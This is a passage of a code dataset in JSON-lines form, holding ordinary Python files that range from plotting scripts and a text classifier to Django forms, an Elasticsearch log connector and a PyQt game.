next_a_state\n\n\n\n\n\n\n\n\n\n\n if (episode + 1) % 100 == 0:\n print(wins,losses)\n clear_output(wait=True)\n print(\"Episode: {}\".format(episode + 1))\n env.render()\n\n if (episode + 1) % 1500 == 0:\n verbose = True\n if (episode + 1) % 101 == 0:\n verbose = False\n\n\nprint(\"**********************************\")\nprint(\"Training is 
done!\\n\")\nprint(\"**********************************\")","sub_path":"gym_test.py","file_name":"gym_test.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"51305490","text":"#!/usr/bin/env python\n\n\"\"\"\nPlots the responce times for Publisher-Subscriber\n\"\"\"\n\nimport matplotlib.pyplot as plot\n\n# File Names where time is stored\npsFile = \"../time_records/ps_times.txt\"\nscFile = \"../time_records/sc_times.txt\"\n\n# Convert text file into a List\npsList = [line.rstrip('\\n') for line in open(psFile)]\nscList = [line.rstrip('\\n') for line in open(scFile)]\n\n# Print the list\nprint(psList)\nprint(scList)\n\n# Convert the numbers in the list to be within 0.01 seconds\ni = 0\nwhile i < len(psList) : \n psList[i] = round(float(psList[i]), 1) \n i += 1\ni = 0\nwhile i < len(scList) : \n scList[i] = round(float(scList[i]), 1) \n i += 1\n\n# Print the modified list\nprint(\"After rounding\")\nprint(psList)\nprint(scList)\n\n\"\"\"\nCreate the histograms from the lists\n\"\"\"\n\nnum_bins = 25\n# alpha: transparency of color\n# num_bins: amount of bars\nn, bins, patches = plot.hist(psList, num_bins, facecolor='blue', alpha = 0.5, label='Publisher-Subsriber')\nn, bins, patches = plot.hist(scList, num_bins, facecolor='green', alpha = 0.5, label='Server-Client')\n\n#plot.hist(psList,density=1, bins=600) \nplot.axis([1, 6, 0, 80]) #axis([xmin,xmax,ymin,ymax])\nplot.ylabel('Messages')\nplot.xlabel('Relay Time in milli seconds')\nplot.legend()\n\nplot.show()\n","sub_path":"pyplot/time_record_plot.py","file_name":"time_record_plot.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"412043463","text":"#!/usr/bin/env python\n\nitems = 5\n\n# basic definintion\ndef main():\n print(\"hello world\")\n print(\"What is the __name__ value ?? {}\".format(__name__))\n\n# while\ndef count_def():\n count = 0\n while count < items:\n print(count)\n count += 1\n\n# if\ndef if_def():\n count = 0\n value_to_find = 2\n\n while count < items:\n if count == value_to_find:\n print(\"Value {} found\".format(count))\n else:\n print(\"Value {} is different from {}\".format(count,value_to_find))\n count += 1\n\n# list\ndef list_def():\n my_list = []\n count = 0\n while count < items:\n print(count)\n my_list.append(count)\n count += 1\n \n print(my_list)\n\n# file / open\ndef write_to_file_def():\n my_list = []\n count = 0\n while count < items:\n print(count)\n my_list.append(count)\n count += 1\n \n print(my_list)\n\n filename = open(\"output.txt\",\"a\")\n print(my_list, file = filename)\n\n\nif __name__ == \"__main__\":\n # pass\n main()\n count_def()\n if_def()\n list_def()\n write_to_file_def()\n\n\n","sub_path":"Topic_05/code01/code01/code01.py","file_name":"code01.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"627722458","text":"import numpy as np\nimport pandas as pd\nimport timeit\n\ndf = pd.read_csv(\"reddit_train.csv\")\n\nX = df[\"comments\"].values\ny = df[\"subreddits\"].values\n\n# DOMAIN KNOWLEDGE\n# ADD MY OWN FEATURES\n # - ex. 
NBA: look for most frequent words\n# Try n-gram on countvectorizer\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.8, test_size = 0.2, random_state = 1234)\n\n# from sklearn.feature_extraction.text import CountVectorizer\n# tfidf_vectorizer = CountVectorizer(stop_words = 'english', max_features = 350000, ngram_range = (1, 2))\n# X_train_tfidf = tfidf_vectorizer.fit_transform(X_train)\n# X_test_tfidf = tfidf_vectorizer.transform(X_test)\n# print(X_train_tfidf.shape)\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\ntfidf_vectorizer = TfidfVectorizer(stop_words = 'english',max_features = 50000, ngram_range = (1, 1)) # 10000\nX_train_tfidf = tfidf_vectorizer.fit_transform(X_train)\nX_test_tfidf = tfidf_vectorizer.transform(X_test)\n\n# Timer begins\nstart = timeit.default_timer()\n\nfrom sklearn.naive_bayes import MultinomialNB\nmnb = MultinomialNB(alpha = 0.32)\nmnb.fit(X_train_tfidf, y_train)\n\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score\ny_pred = mnb.predict(X_test_tfidf)\nprint(accuracy_score(y_test, y_pred))\n\n#-----------------------------GRID SEARCH CROSS VALIDATION------------------------------\n# from sklearn.model_selection import GridSearchCV\n#\n# X_final_train = tfidf_vectorizer.fit_transform(X)\n#\n# tuned_parameters = [{'alpha' : [0.30, 0.31, 0.32, 0.33, 0.34]}]\n# n_folds = 10\n#\n# grid_search = GridSearchCV(estimator = mnb, param_grid = tuned_parameters, cv = n_folds, refit = False, n_jobs = -1)\n#\n# grid_search.fit(X_final_train, y)\n#\n# scores = grid_search.cv_results_['mean_test_score']\n# scores_std = grid_search.cv_results_['std_test_score']\n# print('scores:',scores)\n# print('scores_std',scores_std)\n# print(grid_search.best_params_)\n#\n# # Timer stops\n# stop = timeit.default_timer()\n# print(\"Time Execution: {}\".format(stop - start))\n\n#-----------------------------END OF GRID SEARCH-----------------------------------------\n\n#------------------------------Bagging Classifier Purpose-------------------\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn import model_selection\n\nX_final_train = tfidf_vectorizer.fit_transform(X)\n\nbg = BaggingClassifier(mnb, max_samples = 0.6, max_features = 0.5, n_estimators = 1500)\nresults = model_selection.cross_val_score(bg, X_final_train, y, cv = 5)\nprint(results.mean())\n# print(bg.score(X_final_train, y))\n# Timer stops\nstop = timeit.default_timer()\nprint(\"Time Execution: {}\".format(stop - start))\n#------------------------------End of Baggin classifier----------------------\n\n#-----------------------------FINAL TEST PURPOSE ONLY-----------------------\nX_final_train = tfidf_vectorizer.fit_transform(X)\n\ndf_final = pd.read_csv(\"reddit_test.csv\")\nX_final_test = df_final[\"comments\"].values\nX_final_test = tfidf_vectorizer.transform(X_final_test)\n\n# mnb.fit(X_final_train, y)\n# y_final = mnb.predict(X_final_test)\nbg.fit(X_final_train, y)\ny_final = bg.predict(X_final_test)\n\npredict_arr = np.c_[df_final[\"id\"], y_final]\npredict_dataset = pd.DataFrame({\"Id\": predict_arr[:, 0], \"Category\":predict_arr[:,1]})\npredict_dataset.to_csv(\"out_mnb.csv\", index = False)\n#--------------------------END OF FINAL TEST-----------------------------------\n","sub_path":"final_mnb.py","file_name":"final_mnb.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"175614811","text":"from stat 
import S_ISREG, ST_CTIME, ST_MODE, ST_MTIME\nimport os, sys, time, re\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n \ndef plotLine(name, xData, yData, color, symbol, line='-', doPoints=True):\n if len(xData)!=len(yData):\n print(\"Len x and y do not match: %d vs %d\" %(len(xData), len(yData)));\n #Sort data\n xData, yData = zip(*sorted(zip(xData, yData)))\n #Array of sampling vals for polyfit line\n xp = np.linspace(xData[0], xData[-1]*0.98, 100)\n #polyfit\n #default_z = np.polyfit(xData, yData, 6)\n #default_fit = np.poly1d(default_z)\n # plt.plot(\n # xp, \n # default_fit(xp), \n # str(color)+str(line),\n # label=str(name),\n # lw=1\n # );\n #points\n if(doPoints):\n default_h = plt.plot(\n xData,yData, \n str(symbol),\n label=str(name),\n lw=1,\n color=color\n );\n \ndef loadCSV(path):\n return np.loadtxt(\n path,\n dtype=[('Bin Count','int'), ('Population','int'),('atomic overall(ms)','float'),('atomic memset(ms)','float'),('atomic histogram(ms)','float'),('atomic scan(ms)','float'),('atomic reorder(ms)','float'),('atomic tex(ms)','float')],\n skiprows=2,\n delimiter=',',\n usecols=(2,3,10,11,12,13,14,15),\n unpack=True\n );\n### \n### Locate the suitable files in the directory (.csv's)\n###\npattern = re.compile(\"\\.csv$\");\n# get all entries in the directory w/ stats\nentries = (os.path.join('.', fn) for fn in os.listdir('.'))\n\n# leave only regular files\nentries = ((path)\n for path in entries if (bool (pattern.search(path))))\n\n###\n### Config, labelling\n###\ncolors = ['#000000','#000000','#000000','#999999','#999999','#999999'];\nsymbols = ['*', 'o', '^', 'x', 's', '+', 'h','p'];\nlines = ['-','--',':', '-', '--', ':'];\nfor path in entries:\n plt.clf();#Clear the entire figure\n plt.rc('font', family='serif', serif='Times')\n #plt.rc('text', usetex=True)\n plt.rcParams[\"font.family\"] = \"Times New Roman\"\n plt.rcParams[\"legend.fontsize\"] = 8\n plt.rc('xtick', labelsize=8)\n plt.rc('ytick', labelsize=8)\n plt.rc('axes', labelsize=8)\n fig = plt.figure()\n fig.set_size_inches(3.5, 3.5/1.4)\n #fig.set_size_inches(3.5*3, 3.5*3/1.4)\n co = 6;#5: overall step time, #6: kernel time, #7: rebuild/texture time\n #Label axis\n plt.xlabel('Bin Count');\n plt.ylabel('Overall Construction Time (ms)');\n plt.ticklabel_format(style='sci', useMathText=True, axis='x', scilimits=(0,0));\n ###\n ### Load Data, Create tuples of matching columns from each file\n ###\n csv = loadCSV(path);\n atomic_tex = csv.pop(-1);\n atomic_reorder = csv.pop(-1);\n atomic_scan = csv.pop(-1);\n atomic_histogram = csv.pop(-1);\n atomic_memset = csv.pop(-1);\n atomic_overall = csv.pop(-1);\n pop_size = csv.pop(-1);\n bin_count = csv.pop(-1);\n ###\n ### Filter data, Only publish bin width's that we want\n ###\n plotLine('Overall', bin_count, atomic_overall, colors[0], lines[0])\n plotLine('Memset', bin_count, atomic_memset, colors[1], lines[1])\n plotLine('Histogram', bin_count, atomic_histogram, colors[2], lines[2])\n plotLine('Scan', bin_count, atomic_scan, colors[3], lines[3])\n plotLine('Reorder', bin_count, atomic_reorder, colors[4], lines[4])\n plotLine('Tex', bin_count, atomic_tex, colors[5], lines[5])\n ###\n ### Position Legend\n ###\n #plt.legend(loc='lower right',numpoints=1);\n plt.legend(loc='best',numpoints=1);\n plt.tight_layout();\n ###\n ### Extract name, sans filetype\n ###\n fileName = os.path.splitext(os.path.basename(path))[0]\n ###\n ### Export/Show Plot\n ###\n #plt.savefig('[Atomic]'+ fileName + '.pdf')\n 
plt.savefig('[Atomic]'+ fileName + '.pdf')\n #plt.savefig('[Atomic]'+ fileName + '.pdf')\n plt.close();\n #plt.show();\n","sub_path":"figures/Thesis-ACS Experiment 1/fig_atomic_components.py","file_name":"fig_atomic_components.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"265716054","text":"from django_ltgt.ltgt.apps.data_table.forms import DataTableUpdateForm\nfrom ticket_distro.apps.event.forms import EventBasedForm\nfrom ticket_distro.apps.zone.models import Zone\n\n\nclass ZoneCreateForm(EventBasedForm):\n class Meta:\n model = Zone\n exclude = []\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\nclass ZoneUpdateForm(ZoneCreateForm, DataTableUpdateForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n","sub_path":"ticket_distro/apps/zone/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"571303528","text":"# Who's Your Daddy\n# \n# A program that lets the user enter the name of a male and\n# produces the name of his father.The user can add, replace,\n# and delete son-father pairs.\n\npairs = {\n \"BOBBY\" : \"ROBERT ROBERTSON\",\n \"DONNY\" : \"DANIEL DANIELSON\",\n \"DICKY\" : \"RICHARD RICHARDSON\",\n \"JONNY\" : \"JONATHAN JONATHANSON\"\n}\n\nchoice = None\n\n# print intro\nprint(\"\\tWelcome to Who's your Daddy!\\n\")\nwhile choice !=\"0\":\n # print menu\n print(\"Choices:\")\n print(\n \"\"\"\n 0 - Exit\n 1 - Name of a father\n 2 - Add a son-father pair\n 3 - Edit a son-father pair\n 4 - Delete a son-father pair\n 5 - List all son-father pairs\n \"\"\"\n )\n choice = input(\"\\nYour choice: \")\n\n # exit menu\n if choice == \"0\":\n print(\"Thank you for playing!\")\n continue\n\n # son -> parent\n if choice == \"1\":\n son = input(\"Whose father are you looking for: \")\n son = son.upper()\n if son == \"0\":\n print(\"Exiting...\")\n continue\n while son not in pairs:\n print(\"I don't know who that is, maybe try again?\")\n son = input(\"Whose father are you looking for: \")\n son = son.upper()\n print(f\"\\nI know that!\\nThe father of {son} is {pairs[son]}.\\n\")\n\n # add pair\n elif choice == \"2\":\n son = input(\"Who do you want to add in the database: \")\n son = son.upper()\n father = input(\"And who is their father: \")\n father.upper()\n while son in pairs and father == pairs[son]:\n print(\"The pair is already in the database! 
Try again\\n\")\n son = input(\"Who do you want to add in the database: \")\n son = son.upper()\n father = input(\"And who is their father: \")\n father.upper()\n pairs[son] = father.upper()\n print(\"Son-father pair added to the database.\\n\")\n\n # edit pair\n elif choice == \"3\":\n son = input(\"Who do you want to edit in the database: \")\n son = son.upper()\n while son not in pairs:\n print(\"I don't know who that is, maybe try again?\")\n son = input(\"Who do you want to edit in the database: \")\n son = son.upper()\n father = input(\"And who should their father be: \")\n father.upper()\n pairs[son] = father.upper()\n \n # delete pair\n elif choice == \"4\":\n son = input(\"Who do you want to delete in the database: \")\n son = son.upper()\n while son not in pairs:\n print(\"I don't know who that is, maybe try again?\")\n son = input(\"Who do you want to delete in the database: \")\n son = son.upper()\n pairs.pop(son)\n print(\"Job's done!\")\n \n # list pairs\n elif choice == \"5\":\n print(\"The pairs are:\")\n # print(pairs.items())\n print(\" Son | Father \")\n print(\"--------+\" + \"-\" * 20)\n for item in pairs:\n print(f\" {item:6} | {pairs[item]}\")\n\n # unknown input\n else:\n print(\"Not a defined command. Try again!\\n\\n\")\n\ninput(\"\\n\\nPress the enter key to exit.\")","sub_path":"Chapter05/ch03_whosYourDaddy.py","file_name":"ch03_whosYourDaddy.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"164770085","text":"import nltk\nfrom nltk.corpus import stopwords\nimport os\n\n\n\ndef build_stopwords_list(file_path):\n sw_list = []\n with open(file_path) as f:\n lines = f.readlines()\n for word in lines:\n word = word.replace('\\n', '')\n word = word.lower()\n sw_list.append(word)\n return sw_list\n\n\ndef remove_stopwords(sw_list, tokens):\n new_tokens = []\n for token in tokens:\n if token not in sw_list and len(token) > 3:\n new_tokens.append(token)\n return new_tokens\n\n\ndef get_files(path):\n files = []\n for filename in os.listdir(path):\n file_path = '{0}/{1}'.format(path, filename)\n files.append(file_path)\n return files\n\n\nclass StopWordsHandle:\n def __init__(self):\n self.stopwords_dir = ''\n self.nltk_languages = ['danish', 'dutch', 'english', 'finnish', 'french', 'german', 'hungarian', 'romanian',\n 'italian', 'norwegian', 'portuguese', 'russian', 'spanish', 'swedish',\n 'turkish', 'arabic', 'azerbaijani', 'nepali', 'greek', 'indonesian', 'kazakh']\n\n def clean_text(self, stopwords_dir, language, input_text):\n self.stopwords_dir = stopwords_dir\n if type(input_text) is list:\n clean_text = []\n for row in input_text:\n tokens = self.remove(language, row)\n if len(tokens) > 0:\n clean_text.append(' '.join(tokens))\n return clean_text\n else:\n return self.remove(language, input_text)\n\n\n def remove(self, language, text):\n if language in self.nltk_languages:\n tokens = nltk.word_tokenize(text)\n clear_text = self.remove_stopwords_with_nltk(language, tokens)\n return clear_text\n else:\n stopwords_files = get_files(self.stopwords_dir)\n file_path = self.get_stopwords_file(language, stopwords_files)\n stopwords_list = build_stopwords_list(file_path)\n tokens = nltk.word_tokenize(text)\n clear_text = remove_stopwords(stopwords_list, tokens)\n return clear_text\n\n def remove_stopwords_with_nltk(self, language, tokens):\n if len(tokens) != 0:\n stop_words = set(stopwords.words(language))\n return_list = []\n for token in tokens:\n if not token.lower() in 
stop_words and len(token) > 3:\n return_list.append(token)\n return ' '.join(return_list)\n else:\n return None\n\n def get_stopwords_file(self, language, files_list):\n for full_path in files_list:\n if language in full_path:\n return full_path\n\n\n def get_stopwords(self, language):\n stopwords_files = get_files(self.stopwords_dir)\n file_path = self.get_stopwords_file(language, stopwords_files)\n stopwords = build_stopwords_list(file_path)\n return stopwords\n\n\n\n","sub_path":"features/stopwords_handler.py","file_name":"stopwords_handler.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"473147084","text":"#!/usr/bin/env python\n# encoding=utf8\nimport os\n\nfrom prompt_toolkit.utils import DummyContext\nfrom ptpython.repl import PythonRepl, run_config\n\n\ndef shell(globals_, locals_):\n \"\"\"\n Customized pypython.repl.\n \"\"\"\n # Create REPL.\n repl = PythonRepl(\n get_globals=lambda : globals_,\n get_locals=lambda : locals_,\n history_filename=os.path.expanduser(\"~/.pyhistory.shell\"),\n )\n run_config(repl)\n\n with DummyContext():\n repl.run()\n","sub_path":"python/xiaket/interact.py","file_name":"interact.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"111438995","text":"\"\"\"Contains functionality for model creation and training\n\"\"\"\nimport numpy as np\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom . import common\n\n\ndef create_regional_model(model_type='normal'):\n \"\"\"Creates a regional model\n\n Currently, the only supported model type is 'normal'.\n\n Parameters\n ----------\n model_type : {'normal'}\n\n Returns\n -------\n regional_model : dict\n \"\"\"\n # Handle unsupported arguments\n supported_model_types = ('normal',)\n if model_type not in supported_model_types:\n raise Exception('Unsupported regional model type: {}'.format(model_type))\n\n regional_model = {'model_type': model_type,\n 'is_trained': False}\n return regional_model\n\n\ndef create_boundary_model(model_type='exponential',\n extracted_feature_type=None):\n \"\"\"Creates a boundary model\n\n Supports several model types. Only the 'decision_tree' type allows for model\n training.\n\n Parameters\n ----------\n model_type : {'constant', 'exponential', 'inverse', 'sigmoidal', \\\n 'decision_tree'}\n extracted_feature_type : {1}\n Type-1 is the \"absolute difference, average\" feature.\n\n Returns\n -------\n boundary_model : dict\n \"\"\"\n # Handle unsupported arguments\n supported_model_types = ('constant', 'exponential', 'inverse', 'sigmoidal',\n 'decision_tree')\n if model_type not in supported_model_types:\n raise Exception('Unsupported boundary model type: {}'.format(model_type))\n\n if model_type is 'decision_tree':\n dtc_model = DecisionTreeClassifier(class_weight='balanced')\n boundary_model = {'model_type': model_type,\n 'model': dtc_model,\n 'is_trained': False,\n 'extracted_feature_type': extracted_feature_type}\n else:\n boundary_model = {'model_type': model_type,\n 'is_trained': False}\n return boundary_model\n\n\ndef train_regional_model(regional_model, training_data, training_labels):\n \"\"\"Trains a regional model\n\n Parameters\n ----------\n regional_model : dict\n training_data : np.array\n Has either two or three axes. The first two axes specify a pixel\n location. 
If the image is multimodal, then the array has a third\n        axis that specifies a mode/feature.\n    training_labels : np.array\n        Class labeling from a previous segmentation, which was either\n        created manually with an image editor or created automatically\n        through a first pass with SAASS. The array has two axes that\n        specify a pixel location. The values in the array are label values\n        (0 for bg, 1 for fg).\n\n    Notes\n    -----\n    This function modifies the model dict that is provided as an argument.\n    \"\"\"\n    # Handle unsupported arguments\n    supported_model_types = ('normal',)\n    if regional_model['model_type'] not in supported_model_types:\n        raise Exception('Unsupported regional model type: {}'.format(regional_model['model_type']))\n\n    bg = {'mean': training_data[training_labels == 0].mean(),\n          'std' : training_data[training_labels == 0].std()}\n    fg = {'mean': training_data[training_labels == 1.0].mean(),\n          'std' : training_data[training_labels == 1.0].std()}\n\n    regional_model['bg'] = bg\n    regional_model['fg'] = fg\n    regional_model['is_trained'] = True\n\n\ndef train_boundary_model(boundary_model, training_data, training_labels, edges):\n    \"\"\"Trains a boundary model\n\n    Parameters\n    ----------\n    boundary_model : dict\n    training_data : np.array\n        Has either two or three axes. The first two axes specify a pixel\n        location. If the image is multimodal, then the array has a third\n        axis that specifies a mode/feature.\n    training_labels : np.array\n        Class labeling from a previous segmentation, which was either\n        created manually with an image editor or created automatically\n        through a first pass with SAASS. The array has two axes that\n        specify a pixel location. The values in the array are label values\n        (0 for bg, 1 for fg).\n    edges : list of tuples\n        Indices of neighboring pixels in the image. List consists of various\n        2-component tuples. Each component is the index of a pixel. The two\n        pixels in any given tuple are pixels that neighbor one another. This\n        list provides a way to index into `training_data`. Typically, this list\n        is obtained by creating a 2D grid graph of the dimensions of the image\n        and retrieving all edges from that graph.\n\n    Returns\n    -------\n    Xtrain : np.array\n        The feature array that was built and used during training. This array\n        can be used to visualize the trained model, but doing so is optional.\n\n    Notes\n    -----\n    This function modifies the model dict that is provided as an argument.\n    \"\"\"\n    # Handle unsupported arguments\n    supported_model_types = ('decision_tree',)\n    if boundary_model['model_type'] not in supported_model_types:\n        raise Exception('Boundary model type {} ' \\\n                        'does not support training'.format(boundary_model['model_type']))\n\n    # Get the locations of all the bg, fg nodes\n    # in the initial segmentation\n    bg_nodes = set(zip(*((training_labels < training_labels.max()).nonzero())))\n    fg_nodes = set(zip(*((training_labels > training_labels.min()).nonzero())))\n\n    # Cast training data as float\n    # Needed because the model misbehaves when given integer data\n    training_data = training_data.astype(float)\n\n    # Get values/weights for bg, fg, boundary edges\n    # boundary edges are edges between nodes that belong to different classes\n    # ie. 
(bg, fg) or (fg, bg)\n    bg_edge_vals = [\n        (training_data[xi], training_data[xj])\n        for xi, xj in edges\n        if ((xi in bg_nodes) and (xj in bg_nodes))]\n    fg_edge_vals = [\n        (training_data[xi], training_data[xj])\n        for xi, xj in edges\n        if ((xi in fg_nodes) and (xj in fg_nodes))]\n    boundary_edge_vals = [\n        (training_data[xi], training_data[xj])\n        for xi, xj in edges\n        if ((xi in bg_nodes) and (xj in fg_nodes) or\n            (xi in fg_nodes) and (xj in bg_nodes))]\n\n    # Compute extracted features for bg, fg, boundary edges values\n    Xbg = common.extract_boundary_feature(boundary_model['extracted_feature_type'], bg_edge_vals)\n    Xfg = common.extract_boundary_feature(boundary_model['extracted_feature_type'], fg_edge_vals)\n    Xbound = common.extract_boundary_feature(boundary_model['extracted_feature_type'], boundary_edge_vals)\n\n    # Stack feature arrays\n    Xtrain = np.vstack([Xbg, Xfg, Xbound])\n    Ytrain = np.hstack([np.zeros((Xbg.shape[0] + Xfg.shape[0],)),\n                        np.ones((Xbound.shape[0],))])\n\n    # Train/fit model with features\n    boundary_model['model'].fit(Xtrain, Ytrain)\n    boundary_model['is_trained'] = True\n\n    return Xtrain\n","sub_path":"saass/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"274672124","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\n\n#####----------------------------------------------------------------#####\n#####                                                                #####\n#####   Tutorial / readme:                                           #####\n#####   https://cloud.tencent.com/document/product/583/47077         #####\n#####                                                                #####\n#####----------------------------------------------------------------#####\n\nimport os\nimport json\nimport datetime\nimport time\nimport logging\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\n\n# Required parameters\nES_Address = os.getenv('ES_Address')\nES_User = os.getenv('ES_User')\nES_Password = os.getenv('ES_Password')\nES_Index_KeyWord = os.getenv('ES_Index_KeyWord') # prefix keyword for index names, e.g. Log\n# Optional parameters\nES_Log_IgnoreWord = os.getenv('ES_Log_IgnoreWord') # keys to drop from each log; if unset, everything is written, e.g. name,password\nES_Index_TimeFormat = os.getenv('ES_Index_TimeFormat') # build the index per day or per hour; defaults to per day, e.g. hour\n\n\nlogger = logging.getLogger('elasticsearch')\nlogger.setLevel(logging.INFO)\n\nes = Elasticsearch([ES_Address], http_auth=(ES_User, ES_Password))\n\nif ES_Index_TimeFormat == \"hour\":\n    ES_Index_TimeFormat = \"%Y-%m-%d-%H\"\nelse:\n    ES_Index_TimeFormat = \"%Y-%m-%d\"\n\n# Log cleaning logic, modify as needed\ndef deallog(log): \n    if ES_Log_IgnoreWord != None:\n        for key in ES_Log_IgnoreWord.split(\",\"):\n            log.pop(key, None)\n    log[\"time\"] = datetime.datetime.now().isoformat()\n    return log\n\ndef gendata(records):\n    for record in records:\n        try:\n            log = record\n            while type(log) != dict:\n                log = json.loads(log)\n            # certain key fields from Ckafka can be unescaped or modified here\n            if \"message\" in log.keys() and type(log['message']) == str:\n                message = json.loads(log['message'])\n                log.pop(\"message\", None)\n                log.update(message)\n            log = deallog(log)\n        except:\n            print(\"except:\",record)\n            log = {\"record\":record}\n\n        log['_index'] = ES_Index_KeyWord + '-' + datetime.datetime.now().strftime(ES_Index_TimeFormat)\n\n        if \"log_id\" in log.keys():\n            log['_id'] = log['log_id']\n\n        yield log\n\ndef main_handler(event, context):\n    print('start main_handler')\n    num = len(event['event']['data'])\n    print('the length of msg body is [%s]'%num) \n    bulk(es, gendata(event['event']['data']))\n    result = {\n        'result': 'Succeed'\n    }\n    return result\n\nif __name__ == '__main__':\n    main_handler(None, 
None)\n","sub_path":"Python3.6-CkafkaConnectorSinkToElasticsearch/src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"577135100","text":"from gensim.models import KeyedVectors\r\nimport numpy as np\r\n\r\nglobal model\r\nglobal index2word_set\r\n\r\nmodel = KeyedVectors.load_word2vec_format('genism_data.bin', binary=True)\r\nmodel_list_word = list(model.wv.vocab)\r\n\r\n\r\n\r\ndef avg_feature_vec(sentence, model, num_features, model_list_word):\r\n\r\n    words_in_sentence = sentence.split()\r\n    feature_vec = np.zeros((num_features,), dtype='float32')\r\n    count_words = 0\r\n    for word in words_in_sentence:\r\n        if word in model_list_word:\r\n            count_words += 1\r\n            feature_vec = np.add(feature_vec, model[word])\r\n\r\n    if (count_words > 0):\r\n        feature_vec = np.divide(feature_vec, count_words)\r\n\r\n    return feature_vec\r\n\r\n","sub_path":"model_word2vec.py","file_name":"model_word2vec.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"179161944","text":"# -*- coding: utf-8 -*-\n\nimport sys\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport model\n\napp = QApplication(sys.argv)\n\n#QMainWindow gives us access to other features such as menus, status bar, etc.\nclass MyGame(QMainWindow):\n\n    def __init__(self, parent=None):\n        super(MyGame, self).__init__()\n\n        self.setWindowTitle(\"Game template\")\n        self.initUI()\n\n        self.timer = QBasicTimer()\n        self.time = 0\n\n        self.timer.start(1000/60,self)\n\n    def initUI(self):\n        \"\"\"Initializes all components\"\"\"\n\n        self.frame = QWidget(self)\n        self.setCentralWidget(self.frame)\n\n        self.frame.setMouseTracking(True)\n\n        #The whole window\n        self.layout = QVBoxLayout()\n\n        #Widgets\n        self.model = model.model(self)\n        self.model.setLineWidth(3)\n        self.model.setFrameStyle(QFrame.Plain)\n        self.model.setMinimumSize(500,500)\n        self.layout.addWidget(self.model)\n\n        self.model.setFocus()\n\n\n        self.frame.setLayout(self.layout)\n\n        #Statusbar\n        self.statusBar().showMessage('Ready')\n\n    def keyPressEvent(self, event):\n        \"\"\" this method checks if a button is pressed\"\"\"\n\n        key = event.key()\n\n        # start to move the player if a button is pressed\n        if(key == Qt.Key_W):\n            self.model.should_player_move(\"w\", False)\n\n        if(key == Qt.Key_S):\n            self.model.should_player_move(\"s\", False)\n\n        if(key == Qt.Key_D):\n            self.model.should_player_move(\"d\", False)\n\n        if(key == Qt.Key_A):\n            self.model.should_player_move(\"a\", False)\n\n        self.update()\n\n    def keyReleaseEvent(self, event):\n        \"\"\" this method checks if a button is released\"\"\"\n\n        key = event.key()\n\n        # stop the player if any of the movebuttons is released\n        if(key == Qt.Key_W):\n            self.model.should_player_move(\"w\", True)\n\n        if(key == Qt.Key_S):\n            self.model.should_player_move(\"s\", True)\n\n        if(key == Qt.Key_D):\n            self.model.should_player_move(\"d\", True)\n\n        if(key == Qt.Key_A):\n            self.model.should_player_move(\"a\", True)\n        #######################################################\n\n        self.update()\n\n    def timerEvent(self,event):\n        if (event.timerId() == self.timer.timerId()):\n\n\n\n            if(self.time >= 1.0):\n                self.time = 0.0\n            self.time += 1/15\n\n\n            self.time = float(\"%.2f\"% self.time)\n\n\n            # call the move_player method\n            self.model.move_player(self.time)\n            self.model.check_collision()\n\n            currentPos = self.frame.mapFromGlobal(QCursor.pos())\n\n            # get the mouse 
position\n            self.mouse_x = currentPos.x()\n            self.mouse_y = currentPos.y()\n\n            # check if the mouse is outside the window\n            # if it is set it to either 0 or 500\n            if(self.mouse_x > 500):\n                self.mouse_x = 500\n            if(self.mouse_x < 0):\n                self.mouse_x = 0\n            if(self.mouse_y > 500):\n                self.mouse_y = 500\n            if(self.mouse_y < 0):\n                self.mouse_y = 0\n\n            # print out mouse pos\n            #print(self.mouse_x,self.mouse_y)\n\n            self.model.player_rotate(self.mouse_x, self.mouse_y)\n\n            self.update()\n\n\n    def mousePressEvent(self, event):\n        self.model.should_player_shoot(True)\n\n    def mouseReleaseEvent(self, event):\n        self.model.should_player_shoot(False)\n\n    def run(self):\n        self.show()\n        sys.exit(app.exec_())\n\n#Create an instance and run 